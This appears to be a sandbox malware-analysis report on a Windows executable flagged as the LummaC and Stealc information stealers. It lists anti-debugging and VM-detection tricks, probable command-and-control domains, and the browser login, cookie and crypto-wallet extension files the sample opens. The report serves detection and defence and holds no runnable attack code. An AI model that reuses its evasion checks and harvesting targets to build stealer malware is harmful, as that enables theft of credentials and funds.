Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F351 second address: 693F386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04B2CB21h 0x00000009 jmp 00007F4E04B2CB25h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F4E04B2CB16h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F386 second address: 693F38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F38A second address: 693F38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F4D7 second address: 693F4E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E04C4CBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F4E5 second address: 693F511 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4E04B2CB16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F4E04B2CB16h 0x00000013 jmp 00007F4E04B2CB27h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11EB3E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11EC0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11C0CA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2EC8BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2D6D2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 679DC30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 679DBAF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 69449C1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 696F7D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 69D383B instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7692

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, 00000000.00000002.1628041040.0000000006926000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1624113510.00000000002A5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWu
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DSDT\VBOX__\v
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: file.exe, 00000000.00000002.1628041040.0000000006926000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: RhgfS
Source: file.exe, 00000000.00000002.1625467366.000000000135E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwaretA]
Source: file.exe, 00000000.00000003.1397109628.0000000005CE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: file.exe, 00000000.00000002.1628041040.0000000006926000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1624113510.00000000002A5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: file.exe, 00000000.00000003.1397206400.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.1621863806.00000000000C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: presticitpo.store

Source: file.exe, 00000000.00000002.1628041040.0000000006926000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.1624691171.00000000002EA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Program Manager

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.1455741546.0000000001414000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: es%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1451747862.0000000001414000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1451783978.000000000143B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1482150214.0000000001439000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1455741546.000000000143E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1482231614.000000000143B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.64b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1627798849.00000000064B1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1564217264.00000000088F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum-LTC
Source: file.exe, 00000000.00000003.1380002400.0000000001423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCashlCXKwR2#;
Source: file.exe, 00000000.00000003.1432832517.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Lib=S
Source: file.exe	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.1436261462.0000000001410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1436261462.0000000001410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
